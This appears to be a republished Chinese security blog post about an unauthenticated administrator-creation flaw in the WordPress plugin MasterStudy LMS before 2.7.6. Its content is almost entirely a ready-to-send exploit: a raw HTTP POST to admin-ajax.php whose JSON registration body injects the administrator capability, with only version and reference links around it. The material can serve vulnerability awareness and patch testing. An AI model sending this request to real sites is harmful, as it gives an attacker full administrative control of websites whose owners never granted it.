前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >WordPress 插件 MasterStudy LMS 2.7.5 - 未经身份验证的管理员帐户创建

WordPress 插件 MasterStudy LMS 2.7.5 - 未经身份验证的管理员帐户创建

作者头像
Khan安全团队
发布2022-03-03 09:42:12
4660
发布2022-03-03 09:42:12
举报
文章被收录于专栏:Khan安全团队

# 版本:<2.7.6

# https://www.youtube.com/watch?v=SI_O6CHXMZk

# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6

# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed

代码语言:javascript
复制
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339

{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档